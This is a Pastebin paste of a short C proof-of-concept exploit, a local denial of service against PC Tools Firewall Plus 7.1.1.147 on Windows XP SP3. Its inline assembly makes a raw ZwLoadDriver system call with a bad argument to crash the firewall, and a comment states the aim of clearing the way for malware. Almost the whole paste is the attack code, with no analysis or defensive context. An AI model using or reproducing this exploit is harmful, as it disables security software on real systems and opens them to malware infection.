Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- Exploit Title: PC Tools Firewall Plus Local DoS
- Version: 7.1.1.147
- Author: St1ks (St1ks Modify Version)
- Tested on: Windows XP SP3
- */
- // After executing this small code, PC Tools Firewall crashes so it opens the way to malware escalation
- #include "stdafx.h"
- #include <Windows.h>
- int _tmain(int argc, _TCHAR* argv[])
- {
- for(int i=0;i<512;i++)
- printf(".");
- _asm
- {
- push 0xffffff
- mov eax,61h ; ZwLoadDriver
- mov edx,7FFE0300h ; ntdll.KiFastSystemCall
- call dword ptr ds:[edx]
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment